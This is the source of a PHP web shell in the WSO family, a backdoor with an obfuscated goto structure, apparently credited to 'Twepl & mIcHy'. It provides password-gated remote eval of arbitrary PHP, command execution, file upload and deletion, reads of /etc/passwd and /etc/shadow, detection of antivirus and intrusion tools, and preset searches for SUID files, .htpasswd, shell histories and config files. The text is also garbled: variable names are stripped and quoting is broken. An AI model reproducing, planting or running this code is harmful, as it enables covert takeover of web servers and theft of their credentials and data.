onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); showSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); showSecParam("OS version", @file_get_contents("/proc/version")); showSecParam("Distr name", @file_get_contents("/etc/issue.net")); if (!$GLOBALS["safe_mode"]) { $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); echo "<br>"; $temp = array(); foreach ($userful as $) { if (which($)) { $temp[] = $; } } showSecParam("Userful", implode(", ", $temp)); $temp = array(); foreach ($danger as $) { if (which($)) { $temp[] = $; } } showSecParam("Danger", implode(", ", $temp)); $temp = array(); foreach ($downloaders as $) { if (which($)) { $temp[] = $; } } showSecParam("Downloaders", implode(", ", $temp)); echo "<br/>"; showSecParam("HDD space", ex("df -h")); showSecParam("Hosts", @file_get_contents("/etc/hosts")); showSecParam("Mount options", @file_get_contents("/etc/fstab")); } } else { showSecParam("OS Version", ex("ver")); showSecParam("Account Settings", iconv("CP866", "UTF-8", ex("net accounts"))); showSecParam("User Accounts", iconv("CP866", "UTF-8", ex("net user"))); } echo "</div>"; hardFooter(); } goto h3psb; vmP50: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto f_hzt; bY27C: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (is_array($_FILES["f"]["tmp_name"])) { foreach ($_FILES["f"]["tmp_name"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["f"]["name"][$i])) { echo "Can't upload file!"; } } } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == ".." || basename($) == ".") { continue; } $type = filetype($); if ($type == "dir") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); ex("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", '', time() - 3600); break; default: if (!empty($_POST["p1"])) { prototype("act", $_POST["p1"]); prototype("f", serialize(@$_POST["f"])); prototype("c", @$_POST["c"]); } break; } } hardHeader(); echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; $dirContent = hardScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); if ($dirContent === false) { echo "Can't open this folder!"; hardFooter(); return; } global $sort; $sort = array("name", 1); if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>\xa	function sa() {\xa\x9\x9for(i=0;i<d.files.elements.length;i++)
		\x9if(d.files.elements[i].type == 'checkbox')
	\x9\x9	d.files.elements[i].checked = d.files.elements[0].checked;\xa	}\xa</script>\xa<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xa<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => viewPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } $GLOBALS["sort"] = $sort; function cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a class="tooltip" data-tooltip="Frame" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'frame')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } echo "<tr id=fak><td colspan=7>
	<input type=hidden name=ne value=''>\xa	<input type=hidden name=a value='FilesMan'>\xa\x9<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa	<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
	<label><select name='p1'>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>\342\206\263 Paste</option>"; } echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists("ZipArchive")) { echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; } echo "<option value='tar'>+ tar.gz</option>"; echo "</select></label>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'>&nbsp;"; } echo "<input type='submit' value='submit' style='margin-left:10px'></td></tr></form></table></div>"; hardFooter(); } goto aQGQk; gkT1m: @ini_set("max_execution_time", 0); goto poC4M; u_TFV: $ = true; goto oSUTr; p3F43: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "key", $); } goto UOKiC; aQGQk: function actionStringTools() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("hex2ascii")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("ascii2hex")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("full_urlencode")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd	\'\x0") . "';
"; echo strlen($temp), "
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<h1>String conversions</h1><div class=content>"; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>"; foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } echo "</pre></div><br><h1>Search files:</h1><div class=content>
		<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xa\x9\x9	<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xa	\x9	<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>
	\x9	<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\xa\x9\x9\x9<tr><td></td><td><input type='submit' value='submit'></td></tr>\xa	\x9	</table></form>"; function hardRecursiveGlob($path) { if (substr($path, -1) != "/") { $path .= "/"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $) { if (@is_dir($)) { if ($path != $) { hardRecursiveGlob($); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($), $_POST["p2"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($) . "", "view","")'>" . htmlspecialchars($) . "</a><br>"; } } } } } if (@$_POST["p3"]) { hardRecursiveGlob($_POST["c"]); } echo "</div><br><h1>Search for hash:</h1><div class=content>
\x9\x9<form method='post' target='_blank' name='hf'>
\x9	\x9<input type='text' name='hash' style='width:330px;'><br>\xa            <input type='hidden' name='act' value='find'/><br>\xa		\x9<input type='submit' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()">
\x9	\x9<input style='margin-left: 20px;' type='submit' value='md5decrypter.com' onclick="document.hf.action='https://www.md5decrypter.com/';document.hf.submit()"><br>
\x9	</form></div>"; hardFooter(); } goto gaKKg; qZ6Xj: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto VMrgb; WeQHr: $ = md5($_SERVER["HTTP_USER_AGENT"]); goto p3F43; r4nyR: $ = "fa769dac7a0a94ee47d8ebe021eaba9e"; goto u_TFV; xWgYK: function actionPhp() { if (isset($_POST["ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd	\'\x0") . "';\xa"; echo strlen($temp), "\xa", $temp; die; } hardHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "<h1>PHP info</h1><div class=content>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("!body {.*}!msiU", '', $tmp); $tmp = preg_replace("!a:\w+ {.*}!msiU", '', $tmp); $tmp = preg_replace("!h1!msiU", "h2", $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); $tmp = preg_replace("!body, td, th, h2, h2 {.*}!msiU", '', $tmp); echo $tmp; echo "</div><br>"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; if (!empty($_POST["p1"])) { ob_start(); eval($_POST["p1"]); echo htmlspecialchars(ob_get_clean()); } echo "</pre></div>"; hardFooter(); } goto bY27C; Th0Rk: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto w9TDR; OWR26: function hardFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='#f9c440'>[ Writeable ]</font>" : " <font color=#a10705>(Not writable)</font>"; echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
\x9<tr>\xa		<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g(null,this.c.value,'');" : '') . "return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='submit'></form></td>\xa		<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value);" : '') . "return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
\x9</tr><tr>\xa\x9\x9<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g('FilesMan',null,'mkdir',this.d.value);" : '') . "return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
\x9	<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value,'mkfile');" : '') . "return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
	</tr><tr>\xa\x9	<td><form onsubmit="" . (function_exists("actionConsole") ? "g('Console',null,this.c.value);" : '') . "return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
		<td><form method='post' " . (!function_exists("actionFilesMan") ? " onsubmit="return false;" " : '') . "ENCTYPE='multipart/form-data'>
\x9	<input type=hidden name=a value='FilesMan'>\xa		<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa		<input type=hidden name=p1 value='uploadFile'>
\x9	<input type=hidden name=ne value=''>
\x9\x9<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
		<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>\xa	</tr></table></div>
\x9<!-- particles --> <div id='particles-js'></div><script src='https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js'></script>
	<script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':800}},'color':{'value':'#ffffff'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#000000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':40,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#ffffff','opacity':0.4,'width':1},'move':{'enable':true,'speed':1,'direction':'none','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':200,'line_linked':{'opacity':0.5}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>\xa\x9</body></html>"; } goto gm5Ck; FVur6: if (!isset($_POST["ne"])) { if (isset($_POST["a"])) { $_POST["a"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["a"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["c"])) { $_POST["c"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["c"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p1"])) { $_POST["p1"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p1"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p2"])) { $_POST["p2"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p2"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p3"])) { $_POST["p3"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p3"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } } goto R8xcz; oSUTr: $ = "UTF-8"; goto qDiW5; urnx6: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("<div align='center'><div class='container'><div class='sky'><div class='text'>THANK YOU & BYE</div><div class='stars'></div><div class='stars1'></div><div class='stars2'></div><div class='shooting-stars'></div></div></div></div>\xa<style>html{height:100%}html body{width:100%;height:100%;margin:0;font-family:Nunito, sans-serif;}.container{display:block;position:relative;width:100%;height:100%;background:linear-gradient(to bottom,#020107 0,#201b46 100%)}.container .text{color:#fff;position:absolute;top:50%;right:50%;margin:-10px -75px 0 0;font-size:20px;font-family:Nunito, sans-serif;font-weight:700}.shooting-stars{z-index:10;width:5px;height:85px;border-top-left-radius:50%;border-top-right-radius:50%;position:absolute;bottom:0;right:0;background:linear-gradient(to top,rgba(255,255,255,0),#fff);animation:animShootingStar 10s linear infinite}@keyframes animStar{from{transform:translateY(0)}to{transform:translateY(-2560px) translateX(-2560px)}}@keyframes animShootingStar{from{transform:translateY(0) translateX(0) rotate(-45deg);opacity:1;height:5px}to{transform:translateY(-2560px) translateX(-2560px) rotate(-45deg);opacity:1;height:800px}}</style>\xa<footer id='det' style='position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #ff007e; border-bottom: 1px solid #ff007e'><font face='Century Gothic' color='#ff0048' size='5'><font style='font-size: 10pt' face='Century Gothic'><font face='Tahoma' color='#005aff' size='2.5'><font color='#ff007e'><b> \xc2\251opy\302\256ight : </b></font>\xa<marquee scrollamount='3' scrolldelay='60' width='80%'><b>Twepl & <a href='https://github.com/mIcHyAmRaNe'>mIcHy</a> </b></marquee>  </font></font></font></footer>"); } goto asFIH; YIyjV: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto wlqmv; p17RR: if (!empty($)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $) { prototype(md5($_SERVER["HTTP_HOST"]), $); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $) { hardLogin(); } } goto B0PbS; f_hzt: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto oh1bD; poC4M: @set_time_limit(0); goto BKw4L; M5O7z: if (empty($_POST["a"])) { if (isset($) && function_exists("action" . $)) { $_POST["a"] = $; } else { $_POST["a"] = "FilesMan"; } } goto ZjyZB; y4kgJ: function viewPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000><b>" . perms(@fileperms($f)) . "</b></font>"; } elseif (!@is_writable($f)) { return "<font color=white><b>" . perms(@fileperms($f)) . "</b></font>"; } else { return "<font color=#f9c440><b>" . perms(@fileperms($f)) . "</b></font>"; } } goto YnRbs; IVjDo: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto Oda8Q; oh1bD: function hardHeader() { if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["\xe2\226\x9c"]; } echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . VERSION . "</title>
    <link href='https://fonts.googleapis.com/css?family=Nunito' rel='stylesheet'>
    <link rel='stylesheet' href='https://cdn.rawgit.com/kimeiga/bahunya/css/bahunya-0.1.3.css'>\xa<style>
\x9body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}\xa	#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}\xa\x9body,td,th\x9{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
\x9table.info	{color:#C3C3C3;}
	table#toolsTbl {background-color: #060A10;}
\x9span,h1,a\x9{color:#68b723 !important;}\xa\x9span\x9	{font-weight:bolder;}\xa	h1	\x9\x9{border-left:5px solid #a10705;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}\xa	div.content	{padding:5px;margin-left:5px;background-color:#060a10;}\xa\x9a	\x9	{text-decoration:none;}
	a:hover\x9	{text-decoration:underline;}
\x9.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
	.tooltip:hover::after {opacity:1;visibility:visible;}\xa	.ml1\x9	{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}\xa	.bigarea	{min-width:100%;max-width:100%;height:400px;}
	input, textarea, select	{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}\xa	label {position:relative}
\x9label:after{border-bottom:2px solid #999;border-right:2px solid #999;content:'';display:block;height:5px;margin-top:-4px;pointer-events:none;position:absolute;right:12px;top:50%;-webkit-transform-origin:66% 66%;-ms-transform-origin:66% 66%;transform-origin:66% 66%;-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);-webkit-transition:all .15s ease-in-out;transition:all .15s ease-in-out;width:5px}\xa\x9label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
	form		{margin:0px;}\xa	#toolsTbl\x9{text-align:center;}\xa\x9#fak 	\x9{background:none;}
	#fak td 	{padding:5px 0 0 0;}\xa\x9iframe\x9\x9{border:1px solid #060a10;}\xa	.toolsInp\x9{width:300px}
\x9.main th\x9{text-align:left;background-color:#060a10;}
